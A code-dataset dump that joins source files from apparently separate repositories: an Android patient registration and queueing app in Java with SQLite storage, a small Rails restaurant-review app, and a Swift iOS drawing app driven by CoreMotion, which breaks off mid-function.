mEmlTextView.setText(eml);
navigationView.setNavigationItemSelectedListener(this);
Toolbar toolbar=(Toolbar) findViewById(R.id.toolbar);
setSupportActionBar(toolbar);
mViewPager=(ViewPager) findViewById(R.id.viewPager);
mCardAdapter=new CardPagerAdapter();
mCardAdapter.addCardItem(
new CardItem(R.string.title_1, R.string.text_1,"card_btn_reg",R.id.card_view_1));
mCardAdapter.addCardItem(
new CardItem(R.string.title_2, R.string.text_2,"card_btn_pro",R.id.card_view_2));
mCardAdapter.addCardItem(
new CardItem(R.string.title_3, R.string.text_3,"card_btn_sign",R.id.card_view_3));
mCardShadowTransformer=new ShadowTransformer(mViewPager, mCardAdapter);
mViewPager.setAdapter(mCardAdapter);
mViewPager.setPageTransformer(false, mCardShadowTransformer);
mViewPager.setOffscreenPageLimit(3);
drawer=(DrawerLayout) findViewById(R.id.drawer_layout);
ActionBarDrawerToggle toggle = new ActionBarDrawerToggle(
this,drawer,toolbar,R.string.navigation_drawer_open,R.string.navigation_drawer_close);
drawer.setDrawerListener(toggle);
toggle.syncState();
}
@Override
public void onClick(View view) {
String clicked=view.getTag().toString();
Log.d("clicked",clicked);
if("card_btn_1".equals(clicked)){
}else if("card_btn_2".equals(clicked)){
startActivity(new Intent(Main2Activity.this,ProfileActivity.class));
}else if("card_btn_3".equals(clicked)){
}
}
@Override
public void onCheckedChanged(CompoundButton compoundButton, boolean b) {
}
@Override
public void onBackPressed() {
if (drawer.isDrawerOpen(GravityCompat.START)) {
drawer.closeDrawer(GravityCompat.START);
} else {
if((System.currentTimeMillis()-exitTime) > 2000){
Toast.makeText(getApplicationContext(), "再按一次退出应用", Toast.LENGTH_SHORT).show();
exitTime = System.currentTimeMillis();
} else {
finish();
System.exit(0);
}
}
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.main2, menu);
return true;
}
@Override
public boolean onOptionsItemSelected(MenuItem item) {
int id = item.getItemId();
if (id == R.id.action_settings) {
startActivity(new Intent(Main2Activity.this,SettingsActivity.class));
return true;
}else if(id == R.id.action_quit) {
new AlertDialog.Builder(Main2Activity.this).setTitle("提示")
.setMessage("真的要退出当前用户吗?")
.setPositiveButton("确定", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
invalidate();
startActivity(new Intent(Main2Activity.this,LoginActivity.class));
finish();
}
}).setNegativeButton("返回", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
}
}).show();
}
return super.onOptionsItemSelected(item);
}
@Override
public boolean onNavigationItemSelected(MenuItem item) {
int id = item.getItemId();
drawer.closeDrawer(GravityCompat.START);
// if (id == R.id.nav_index) {
//
// } else
if (id == R.id.nav_act){
Smoother.startActivity(Main2Activity.this,MainActivity.class);
} else if (id == R.id.nav_act1) {
Smoother.startActivity(Main2Activity.this,RegisterActivity.class);
} else if (id == R.id.nav_act2) {
Smoother.startActivity(Main2Activity.this,ProfileActivity.class);
} else if (id == R.id.nav_act3) {
Smoother.startActivity(Main2Activity.this,PatinetSignActivity.class);
} else if (id == R.id.nav_share) {
attemptShare();
} else if (id == R.id.nav_send) {
Smoother.startActivity(Main2Activity.this,ScrollingActivity.class);
} else if (id == R.id.nav_quit) {
new AlertDialog.Builder(Main2Activity.this).setTitle("提示")
.setMessage("真的要退出吗?")
.setPositiveButton("确定", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
invalidate();
finish();
Smoother.startActivity(Main2Activity.this,LoginActivity.class);
}
}).setNegativeButton("返回", null).show();
} else if (id == R.id.nav_setting){
Smoother.startActivity(Main2Activity.this,SettingsActivity.class);
}
return true;
}
private void attemptShare(){
Intent intent = new Intent();
intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
ComponentName comp = new ComponentName("com.tencent.mm",
"com.tencent.mm.ui.tools.ShareToTimeLineUI");
intent.setComponent(comp);
intent.setAction(Intent.ACTION_SEND);
intent.setType("image/*");
SaveDrawable.saveDrawableById(getResources(),R.drawable.share,
Environment.getExternalStorageDirectory()+"/download/share.jpg");
Uri imgUri;
// Resources res = this.getResources();
// imgUri = Uri.parse(ContentResolver.SCHEME_ANDROID_RESOURCE + "://"
// + res.getResourcePackageName(R.drawable.share) + "/"
// + res.getResourceTypeName(R.drawable.share) + "/"
// + res.getResourceEntryName(R.drawable.share));
imgUri=Uri.fromFile(new File(Environment.getExternalStorageDirectory()+"/download/share.jpg"));
intent.putExtra("Kdescription", "Hey,我正在试用健康不用等app。在线就能轻松挂号,看病快人一步!自从用上它才知道什么叫做相见恨晚,你也来试试吧!");
intent.putExtra(Intent.EXTRA_STREAM, imgUri);
startActivity(intent);
}
public static void conduct(String keyword){
if(keyword.equals("reg")){
context.startActivity(new Intent(context,RegisterActivity.class));
}else if(keyword.equals("pro")){
context.startActivity(new Intent(context,ProfileActivity.class));
}else if(keyword.equals("sign")){
context.startActivity(new Intent(context,PatinetSignActivity.class));
}
}
private void invalidate(){
SharedPreferences.Editor editor
=getSharedPreferences("current",MODE_PRIVATE).edit();
editor.putBoolean("valid",false);
editor.putBoolean("reg",false);
editor.putBoolean("queue",false);
editor.putInt("qtime",-1);
editor.putInt("before",0);
editor.putString("name","");
editor.putString("card","");
editor.putString("eml","");
editor.putString("psw","");
editor.putString("pid","");
editor.commit();
}
}
<file_sep>/app/src/main/java/com/patient/framework/service/UserServices.java
package com.patient.framework.service;
import android.content.Context;
import com.patient.framework.model.User;
import com.patient.framework.repository.UserRepository;
public class UserServices {
private UserRepository userRepository;
public UserServices(Context context) {
userRepository=new UserRepository(context);
}
public String register(User user){
int result=userRepository.addUser(user);
switch(result){
case 1: return "注册成功!即将返回首页登录...";
case 0: return "注册失败,请您稍后再次尝试";
case -1: return "注册失败,用户已存在";
default: return "后台出现未知错误";
}
}
public String login(User user){
int result=userRepository.isValid(user);
switch(result) {
case 1:
return "登录成功";
case 0:
return "登录失败,邮箱或密码错误";
case -1:
return "用户不存在";
default:
return "登录失败,邮箱或密码错误";
}
}
public String update(User user){
if(userRepository.updateUserInfo(user)){
return "已更新";
}else{
return "更新失败";
}
}
public String resetPsw(User user){
int result=userRepository.resetUserPsw(user);
switch(result){
case 1: return "密码重置成功!即将返回首页登录...";
case 0: return "后台出现未知错误";
case -1: return "密码重置失败,填写信息与用户信息不一致";
default: return "后台出现未知错误";
}
}
public String changePsw(User user,String newPsw){
if(userRepository.updateUserPsw(user,newPsw)){
return "密码修改成功";
}else{
return "密码修改失败";
}
}
public String resign(User user){
if(userRepository.deleteUser(user)){
return "注销成功";
}else{
return "注销失败";
}
}
}
<file_sep>/app/src/main/java/com/patient/framework/model/PatientSign.java
package com.patient.framework.model;
public class PatientSign {
int sid;
int pid;
float height;
float weight;
float temp;
float breath;
float pulse;
float blsugar;
String pressure;
String more;
public PatientSign() {
}
public PatientSign(int pid,float height, float weight, float temp, float breath, float pulse, String pressure, float blsugar, String more) {
this.pid = pid;
this.height = height;
this.weight = weight;
this.temp = temp;
this.breath = breath;
this.pulse = pulse;
this.pressure = pressure;
this.blsugar = blsugar;
this.more = more;
}
public PatientSign(int sid, int pid, float height, float weight, float temp, float breath, float pulse, String pressure, float blsugar, String more) {
this.sid = sid;
this.pid = pid;
this.height = height;
this.weight = weight;
this.temp = temp;
this.breath = breath;
this.pulse = pulse;
this.pressure = pressure;
this.blsugar = blsugar;
this.more = more;
}
public int getId() {
return sid;
}
public void setId(int sid) {
this.sid = sid;
}
public int getPid() {
return pid;
}
public void setPid(int pid) {
this.pid = pid;
}
public float getHeight() {
return height;
}
public void setHeight(float height) {
this.height = height;
}
public float getWeight() {
return weight;
}
public void setWeight(float weight) {
this.weight = weight;
}
public float getTemp() {
return temp;
}
public void setTemp(float temp) {
this.temp = temp;
}
public float getBreath() {
return breath;
}
public void setBreath(float breath) {
this.breath = breath;
}
public float getPulse() {
return pulse;
}
public void setPulse(float pulse) {
this.pulse = pulse;
}
public String getPressure() {
return pressure;
}
public void setPressure(String pressure) {
this.pressure = pressure;
}
public float getBlsugar() {
return blsugar;
}
public void setBlsugar(float blsugar) {
this.blsugar = blsugar;
}
public String getMore() {
return more;
}
public void setMore(String more) {
this.more = more;
}
@Override
public String toString() {
return "PatientSign{" +
"sid=" + sid +
", pid=" + pid +
", height=" + height +
", weight=" + weight +
", temp=" + temp +
", breath=" + breath +
", pulse=" + pulse +
", pressure=" + pressure +
", blsugar=" + blsugar +
", more='" + more + '\'' +
'}';
}
public String[] getAll(){
return new String[]{Integer.toString(pid),Float.toString(height),Float.toString(weight),Float.toString(temp),Float.toString(breath),Float.toString(pulse),pressure,Float.toString(blsugar),more};
}
public String[] getInfo(){
return new String[]{Integer.toString(sid),Integer.toString(pid),Float.toString(height),Float.toString(weight),Float.toString(temp),Float.toString(breath),Float.toString(pulse),pressure,Float.toString(blsugar),more};
}
}
<file_sep>/app/src/main/java/com/patient/framework/repository/QueueRepository.java
package com.patient.framework.repository;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.util.Log;
import com.patient.framework.model.Queue;
import com.patient.framework.service.DBConnector;
import java.text.SimpleDateFormat;
import java.util.Date;
public class QueueRepository {
private static QueueRepository queueRepository;
private SQLiteDatabase db;
public QueueRepository(Context context){
DBConnector connector=new DBConnector(context);
db=connector.getWritableDatabase();
}
public synchronized static QueueRepository getInstance(Context context) {
if (queueRepository == null) {
queueRepository = new QueueRepository(context);
}
return queueRepository;
}
public int onQueue(Queue queue){
if(queue!=null){
try {
Cursor cursor=db.rawQuery("SELECT * FROM queue WHERE qid=?",
new String[]{Integer.toString(queue.getQId())});
if (cursor.getCount()>0){
cursor.close();
return -1;
}else{
cursor.close();
try{
db.execSQL("INSERT INTO queue(pid,deid,rid,drid,start,stayed) values(?,?,?,?,?,?)",
new Object[]{queue.getpId(),queue.getDeId(),queue.getrId(),queue.getDrId(),
queue.getStartTime(),queue.getStayed()});
return 1;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
}
}
}catch (Exception e){
e.printStackTrace();
db.execSQL("CREATE TABLE IF NOT EXISTS queue(qid integer primary key autoincrement,pid integer,deid integer,rid integer,drid integer,timestamp date,start double,end double,stayed integer)");
}
}
return 0;
}
public boolean offQueue(Queue queue){
try{
db.execSQL("UPDATE queue SET stayed=?,end=? WHERE qid=?",
new Object[]{queue.getStayed(),queue.getEndTime(),queue.getQId()});
return true;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
return false;
}
}
public Queue getQueue(int pid,int stayed){
try {
Cursor cursor =db.rawQuery("SELECT * FROM queue WHERE pid=? AND stayed=?",
new String[]{Integer.toString(pid),Integer.toString(stayed)});
if(cursor.getCount()>0){
try {
cursor.moveToFirst();
SimpleDateFormat dateFormat=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
String timeStamp=cursor.getString(5);
if(timeStamp==null||"".equals(timeStamp)){
timeStamp=dateFormat.format(new Date());
}
return new Queue(cursor.getInt(0),cursor.getInt(1),
cursor.getInt(2),cursor.getInt(3),
cursor.getInt(4),dateFormat.parse(timeStamp),
cursor.getDouble(6),cursor.getDouble(7),
cursor.getInt(8));
}catch(Exception e){
e.printStackTrace();
return null;
}
}else{
cursor.close();
return null;
}
}catch (Exception e){
db.execSQL("CREATE TABLE IF NOT EXISTS queue(qid integer primary key autoincrement,pid integer,deid integer,rid integer,drid integer,timestamp date,start double,end double,stayed integer)");
e.printStackTrace();
}
return null;
}
public int getBefore(int qid){
Cursor cursor =db.rawQuery("SELECT COUNT(*) count FROM queue WHERE stayed=1 AND qid<? ORDER BY start",new String[]{Integer.toString(qid)});
if(cursor.getCount()>0) {
cursor.moveToFirst();
return cursor.getInt(0);
}else{
return 0;
}
}
public int getAfter(int qid){
Cursor cursor =db.rawQuery("SELECT COUNT(*) count FROM queue WHERE stayed=1 AND qid>? ORDER BY start",new String[]{Integer.toString(qid)});
if(cursor.getCount()>0) {
cursor.moveToFirst();
return cursor.getInt(0);
}else{
return 0;
}
}
}
| bb799b4399496d9ebfd7c846ca2a5261797d6eb0 | [
"Java"
] | 8 | Java | relwalter/Patient | 234867d3d9151c9ee75b4bb4edc31fd2a03674e3 | 6fd83d56f463d475c603d821e1ce7f6dbec7b1cd |
refs/heads/master | <repo_name>Nova-Wintermute/Nova-Wintermute<file_sep>/OIPA/.bashrc
export WORKON_HOME=/home/matthijs/.virtualenvs
<file_sep>/rails-yelp-mvp/db/seeds.rb
# This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rake db:seed (or created alongside the db with db:setup).
#
# Examples:
#
# cities = City.create([{ name: 'Chicago' }, { name: 'Copenhagen' }])
# Mayor.create(name: 'Emanuel', city: cities.first)
# category: { chinese: 0, italian: 1, japanese: 2, french: 3, belgian: 4}
Restaurant.destroy_all
restaurants_attributes = [
{
name: "<NAME>",
address: "112 rue du Fg St-Honoré 75008 Paris",
phone_number: "0601232151",
category: 3
},
{
name: "<NAME>",
address: "4 rue Blainville 75005 Paris",
phone_number: "2123101723",
category: 4
},
{
name: "<NAME>",
address: "route de Suresnes 75016 Paris",
phone_number: "624522454",
category: 1
},
{
name: "<NAME>",
address: "3straat, Den Haag",
phone_number: "62455633422454",
category: 2
},
{
name: "<NAME>",
address: "Rue David Mitchell, Neo-Seoul",
phone_number: "52013578",
category: 0
},
{
name: "Caesar",
address: "Imperial Avenue",
phone_number: "624345555555",
category: 1
}
]
restaurants_attributes.each { |params| Restaurant.create!(params) }
<file_sep>/rails-yelp-mvp/app/models/review.rb
class Review < ActiveRecord::Base
belongs_to :restaurant
validates :rating, :content, :restaurant, presence: true
validates :rating, numericality: { only_integer: true }
validates :rating, numericality: { greater_than_or_equal_to: 0, less_than_or_equal_to: 5 }
end
<file_sep>/rails-yelp-mvp/app/models/restaurant.rb
class Restaurant < ActiveRecord::Base
has_many :reviews, dependent: :destroy
enum category: { chinese: 0, italian: 1, japanese: 2, french: 3, belgian: 4}
validates :name, :address, :category, presence: true
# validates_inclusion_of :category in: Restaurant.categories.keys
end
| 701f3736f7dc01b6dc88d73d7b2bcd7642e93d20 | [
"Ruby",
"Shell"
] | 4 | Shell | Nova-Wintermute/Nova-Wintermute | 2e7ee1b20985ebbce7f6a2723512c7e4882bd0b8 | fa206c51b785155c8115130091f2f7214e6ec5f6 |
refs/heads/master | <file_sep>import { Http } from '../main';
import 'jasmine-ajax';
describe('Request class tests', function(){
    // Live endpoint used only by the JSONP specs below. JSONP works via
    // <script> injection rather than XMLHttpRequest, so jasmine-ajax
    // cannot intercept it and these specs may depend on network access.
    var JSONP_URL = 'http://resources2.buongiorno.com/lapis/apps/categories.getList?real_customer_id=xx_gameasy&id=&lang=en&formats=html5applications&sort=&size=5&offset=0&white_label=xx_gameasy&main_domain=http://www2.gameasy.com/ww-it/&fw=gameasy&vh=ww.gameasy.com&sort=meta.en.name';

    // Install the jasmine-ajax mock so every XHR in a spec is intercepted.
    beforeEach(function() {
        jasmine.Ajax.install();
    });

    // Restore the native XMLHttpRequest after each spec.
    afterEach(function() {
        jasmine.Ajax.uninstall();
    });
it('200 GET JSON as response', function(done){
    var endpoint = '/get/json';
    var onSuccess = jasmine.createSpy('success');

    // Answer the stubbed endpoint with a JSON body and a 200 status.
    jasmine.Ajax.stubRequest(endpoint).andReturn({
        'status': 200,
        'contentType': 'text/json',
        'response': { data: 'aa' }
    });

    var theRequest = new Http({
        method: 'get',
        url: endpoint,
        responseType: 'json'
    });

    // The promise resolves with [body, status, call]; the spy records it,
    // and the follow-up handler asserts the recorded resolution value.
    theRequest.promise
        .then(onSuccess)
        .then(function(){
            var lastCall = theRequest.calls[theRequest.calls.length - 1];
            expect(onSuccess).toHaveBeenCalledWith([{ data: 'aa' }, 200, lastCall]);
            done();
        });
});
it('404 GET JSON as response with two attempts', function(done){
    // Every request to this URL fails with a 404, which forces Http to
    // consume its retry budget before rejecting the promise.
    var url = '/get/json';
    jasmine.Ajax.stubRequest(url).andReturn({
        'response': { error: true },
        'status': 404,
        'statusText': 'HTTP/1.1 404 NOT FOUND',
        'contentType': 'application/json'
    });
    // Two attempts, retried 100ms apart.
    var theRequest = new Http({
        method: 'get',
        url: url,
        responseType: 'json',
        attempt: 2,
        retryAfter: 100
    });
    var success = jasmine.createSpy('success');
    var error = jasmine.createSpy('error');
    theRequest.promise.then(success)
        .catch(error).then(function(){
            // Retry budget exhausted: one recorded XHR per attempt, the
            // rejection carries the final status, and success never fired.
            expect(theRequest.options.attempt).toEqual(0);
            expect(theRequest.calls.length).toEqual(2);
            expect(error).toHaveBeenCalledWith({ status: 404, statusText: '' });
            expect(success).not.toHaveBeenCalled();
            done();
        });
});
it('200 GET HTML as response', function(done){
    var url = '/get/html';
    // Serve the current document back as XML so responseType 'document'
    // can be exercised without fetching a real page.
    jasmine.Ajax.stubRequest(url).andReturn({
        'responseXML': window.document,
        'status': 200,
        'statusText': 'OK',
        'contentType': 'text/xml;charset=UTF-8'
    });
    var success = jasmine.createSpy('success');
    var error = jasmine.createSpy('error');
    var progress = jasmine.createSpy('progress');
    // Make the request
    var theRequest = new Http({
        method: 'get',
        url: url,
        responseType: 'document',
        onProgress: progress
    });
    theRequest.promise.then(function(result){
        success(result);
        expect(success).toHaveBeenCalled();
        // The mocked progress event carries no computable length, so the
        // reported percentage is NaN (jasmine matches NaN against NaN).
        expect(progress).toHaveBeenCalled();
        expect(progress).toHaveBeenCalledWith(NaN);
        expect(error).not.toHaveBeenCalled();
        done();
    }).catch(error);
});
it('200 GET TEXT as response', function(done){
    var url = '/get/text';
    // Plain-text stub: the promise must resolve with the raw string body.
    jasmine.Ajax.stubRequest(url).andReturn({
        'responseText': 'Testo!',
        'status': 200,
        'statusText': 'OK',
        'contentType': 'text/plain;charset=UTF-8'
    });
    // Make the request
    var theRequest = new Http({
        method: 'get',
        url: url,
        responseType: 'text'
    });
    theRequest.promise.then(function(result){
        // result is [body, status, call]; only the body is asserted here.
        expect(result[0]).toEqual('Testo!');
        done();
    });
});
it('200 POST a json object', function(done){
    var url = '/post/echo';
    var data = { some: 'data' };
    // Echo stub: the server answers with the same JSON it was sent.
    jasmine.Ajax.stubRequest(url).andReturn({
        'response': JSON.stringify(data),
        'status': 200,
        'statusText': 'OK',
        'contentType': 'application/json;charset=UTF-8'
    });
    // Make the request
    var theRequest = new Http({
        method: 'POST',
        url: url,
        responseType: 'json',
        data: data
    });
    theRequest.promise.then(function(result){
        expect(JSON.parse(result[0])).toEqual(data);
        done();
    }).catch(function(reason){
        // Fail the spec immediately on rejection; previously the rejection
        // was only logged, leaving the spec to hang until Jasmine's timeout.
        done.fail(reason);
    });
});
it('200 PUT ', function(done){
    var url = '/put/echo';
    var data = { aa: 'bb' };
    // Echo stub for the PUT verb.
    jasmine.Ajax.stubRequest(url).andReturn({
        'response': JSON.stringify(data),
        'status': 200,
        'statusText': 'OK',
        'contentType': 'application/json;charset=UTF-8'
    });
    // PUT
    // NOTE(review): this spec passes dataType, not responseType, to Http —
    // confirm which option name the Http module actually reads.
    var putTask = new Http({
        method: 'PUT',
        url: url,
        dataType: 'json',
        data: data
    });
    putTask.promise.then(function(results){
        var obj = JSON.parse(results[0]);
        expect(obj).toEqual({ aa: 'bb' });
        done();
    }).catch(function(reason){
        // The old catch handler called done() unconditionally, so the spec
        // passed even when the request failed; report the failure instead.
        done.fail(reason);
    });
});
it('200 DELETE ', function(done){
var url = '/delete/echo';
var data = { aa: 'bb' };
jasmine.Ajax.stubRequest(url).andReturn({
'response': JSON.stringify(data),
'status': 200,
'statusText': 'OK',
'contentType': 'application/json;charset=UTF-8'
});
// DELETE
var deleteTask = new Http({
method: 'DELETE',
url: url,
dataType: 'json',
data: { aa: 'bb' }
});
deleteTask.promise.then(function(results){
var obj = JSON.parse(results[0]);
expect(obj).toEqual({ aa: 'bb' });
done();
}).catch(function(){
done();
});
});
it('JSONP with Http module', (done) => {
var r = new Http({
method: 'JSONP',
url: JSONP_URL
});
r.promise.then((response) => {
expect(response).toBeDefined();
expect(r.calls.length).toEqual(1);
done();
}).catch((reason) => {
console.log(r.calls);
done();
});
});
it('JSONP fail with Http module', (done) => {
var r = new Http({
method: 'JSONP',
url: '',
timeout: 1000
});
var mySuccessSpy = jasmine.createSpy('success');
r.promise.then(mySuccessSpy).catch((reason) => {
expect(reason).toBeDefined();
var call = r.calls[r.calls.length - 1];
expect(r.calls.length).toEqual(1);
expect(mySuccessSpy).not.toHaveBeenCalled();
done();
});
});
});<file_sep># http-francis
## [!!!] This repository has been deprecated, we suggest to use [https://github.com/docomodigital/js-fetcher](https://github.com/docomodigital/js-fetcher) instead
[](https://travis-ci.org/D-Mobilelab/http-francis)
[](https://coveralls.io/github/D-Mobilelab/http-francis?branch=master)
[](https://badge.fury.io/js/http-francis)
[](https://badge.fury.io/bo/http-francis)
[](https://badge.fury.io/gh/D-Mobilelab%http-francis)
- retry
- attempts
- promise based
### Commands
- npm run build
- npm run test
- npm run test:watch // run tests while typing
- npm run documentation // generate docs folder with .html, append docs to the readme.md
### Release a new version
- npm version patch|minor|major
This will generate the docs/<version> and dist/
# API
## Francis#Http
## constructor
an http class to make requests over the net with retry and interval between them
**Parameters**
- `requestParams` **[object](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object)** object where you can specify the options of the request
- `requestParams.type` **\[[string](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)]** the type of the request: possible values POST, GET, PUT, DELETE and JSONP (optional, default `GET`)
- `requestParams.url` **[string](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)** the url to request for
- `requestParams.headers` **\[[object](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object)]** the headers object (optional, default `{}`)
- `requestParams.timeout` **\[[string](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)]** the timeout of the request in ms (optional, default `2000`)
- `requestParams.attempt` **\[[string](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)]** the number of attempts; if the request fails it is retried until this many attempts have been made (optional, default `1`)
- `requestParams.retryAfter` **\[[number](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number)]** the interval between requests in ms: 500 for example (optional, default `0`)
- `requestParams.async` **\[[boolean](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Boolean)]** the request can be made synchronous; defaults to asynchronous (optional, default `true`)
- `options`
- `callback` **\[[function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/function)]** onend callback (optional, default `function(){}`)
**Examples**
```javascript
<pre>
npm install --save http-francis
import { Http, getImageRaw, JSONPRequest } from 'http-francis';
OR
var Http = require("http-francis").Http;
OR
<script src='http-francis.js'></script>
// in global case window['http-francis'].Http
var getTask = new Http({
method: "GET",
url: "https://someimageurl/image.png",
responseType: "blob",
mimeType: "image/png",
onProgress:(percentage)=>{
// there must be Content-Length header in the response to get the right percentage
// otherwise percentage is a NaN
}
});
getTask.promise.then((response) => {
var imgTag = document.createElement("img");
imgTag.src = response[0];
document.body.appendChild(imgTag);
});
</pre>
```
## parseResponse
parseResponse
**Parameters**
- `xhr` **[XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest)** parse
Returns **[array](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array)** [responseData, statusCode, xhr]
## getImageRaw
getImageRaw from a specific url
**Parameters**
- `options` **[Object](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object)** the options object
- `options.url` **[String](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)** http or whatever
- `options.responseType` **\[[String](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)]** possible values arraybuffer|blob (optional, default `"blob"`)
- `options.mimeType` **\[[String](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)]** possible values "image/png"|"image/jpeg" used only if "blob" is set as responseType (optional, default `"image/jpeg"`)
- `_onProgress` **\[[Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/function)]** (optional, default `function(){}`)
Returns **[Promise](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise)<([Blob](https://developer.mozilla.org/en-US/docs/Web/API/Blob) \| [ArrayBuffer](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/ArrayBuffer) \| [Error](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Error))>**
## JSONPRequest
Make a jsonp request, remember only GET
The function creates a script tag and appends a callback parameter to the query string.
The promise will be rejected after 3s if the URL fails to respond
**Parameters**
- `url` **[String](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)** the url with querystring but without &callback at the end or &function
- `timeout` **\[[Number](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number)](default 3000)** ms range for the response
**Examples**
```javascript
<pre>
request = new JSONPRequest("http://www.someapi.com/asd?somequery=1");
request.then((data) => {});
</pre>
```
Returns **[Promise](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise)<([Object](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object) \| [String](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String))>**
## getJSON
getJSON
**Parameters**
- `url` **[String](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)** for example <http://jsonplaceholder.typicode.com/comments?postId=1>
Returns **[Promise](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise)** the string error is the statuscode
## Francis
an http module to make requests over the net with retry and interval between them
| c0defa4540f69c97c645a7d1926d85222c521e80 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | D-Mobilelab/http-francis | bb303b4aaad810014939d1fd237982a4dcceed4c | 4025a89244c4cdfe96e42dcf6b79c4170c4cee01 |
refs/heads/master | <file_sep>//
// ViewController.swift
// drawing
//
// Created by <NAME> on 7/6/17.
// Copyright © 2017 GT. All rights reserved.
//
import UIKit
import CoreMotion
class ViewController: UIViewController {
    // Motion plumbing: `motionManager` is created in viewDidLoad.
    // NOTE(review): `MGMT` is just an alias of the same manager instance --
    // consider keeping only one of the two properties.
    var motionManager: CMMotionManager?
    var myQ: OperationQueue? = nil
    var MGMT: CMMotionManager?
    // True while the draw button is held down.
    var touched = false
    var timer = Timer()
    // Stroke colour used by drawLines; changed via colorChange(_:).
    var currentColor = UIColor.black
    // Swatch label showing the currently selected colour.
    @IBOutlet weak var currentChosenColor: UILabel!
    // Draw button released: stop the timer and the motion updates.
    @IBAction func onRealRelease(_ sender: UIButton) {
        touched = false
        timer.invalidate()
        if let manager = motionManager {
            manager.stopDeviceMotionUpdates()
        }
    }
    // Clears the canvas.
    @IBAction func resetFunc(_ sender: UIButton) {
        permView.image = nil
    }
    // Creates the motion manager and, when device motion is available,
    // prepares the operation queue and a 0.02s (50 Hz) update interval.
    override func viewDidLoad() {
        super.viewDidLoad()
        motionManager = CMMotionManager()
        if let manager = motionManager {
            MGMT = manager
            print("We have a motion manager")
            if manager.isDeviceMotionAvailable {
                print("We can detect device motion!")
                myQ = OperationQueue()
                manager.deviceMotionUpdateInterval = 0.02
            } else {
                // NOTE(review): this alert has no actions, so once shown it
                // cannot be dismissed -- consider adding an OK action.
                let alert = UIAlertController(title: "Drawing", message: "Your device does not have the necessary sensors. You might want to try on another device.", preferredStyle: .alert)
                present(alert, animated: true, completion: nil)
                print("We can not detect device motion!")
            }
        } else {
            print("We do not have a motion manager")
        }
        currentChosenColor.backgroundColor = currentColor
    }
    // Picks the stroke colour from the tapped button's background colour.
    @IBAction func colorChange(_ sender: UIButton) {
        currentColor = sender.backgroundColor!
        currentChosenColor.backgroundColor = currentColor
    }
    // While the draw button is held, map device pitch/roll into screen
    // coordinates and draw on the main queue.
    @IBAction func onRelease(_ sender: UIButton) {
        touched = true
        MGMT!.startDeviceMotionUpdates(to: myQ!, withHandler: {
            (data: CMDeviceMotion?, error: Error?) in
            if let mydata = data {
                print("My pitch ", mydata.attitude.pitch)
                print("My roll ", mydata.attitude.roll)
                // Scale the attitude angles and offset them into view space.
                let thisPitch = self.degrees(radians: mydata.attitude.pitch * 5) + 300
                let thisRoll = self.degrees(radians: mydata.attitude.roll * 2.5) + 200
                let currentPoint = CGPoint(x: thisRoll, y: thisPitch)
                print(currentPoint)
                // NOTE(review): lastPoint is overwritten *before* the async
                // draw runs, so drawLines always receives fromPoint ==
                // toPoint and only dots are drawn; to get connected strokes,
                // capture the previous point first -- confirm intent.
                self.lastPoint = currentPoint
                DispatchQueue.main.async {
                    self.drawLines(fromPoint: currentPoint, toPoint: self.lastPoint)
                }
            }
            if let myerror = error {
                print("myError", myerror)
                self.MGMT!.stopDeviceMotionUpdates()
            }
        })
    }
    // Radians-to-degrees conversion helper.
    func degrees(radians:Double) -> Double {
        return (180/Double.pi) * radians
    }
    // Canvas image view accumulating the drawing, and the previous point.
    @IBOutlet weak var permView: UIImageView!
    var lastPoint = CGPoint.zero
    // Draws one 15pt round-capped segment from fromPoint to toPoint into
    // permView's image using an offscreen image context.
    @objc func drawLines(fromPoint: CGPoint, toPoint: CGPoint) {
        UIGraphicsBeginImageContext(self.view.frame.size)
        permView.image?.draw(in: CGRect(x: 0, y: 0, width: self.view.frame.width, height: self.view.frame.height))
        let context = UIGraphicsGetCurrentContext()
        context?.move(to: CGPoint(x: fromPoint.x, y: fromPoint.y))
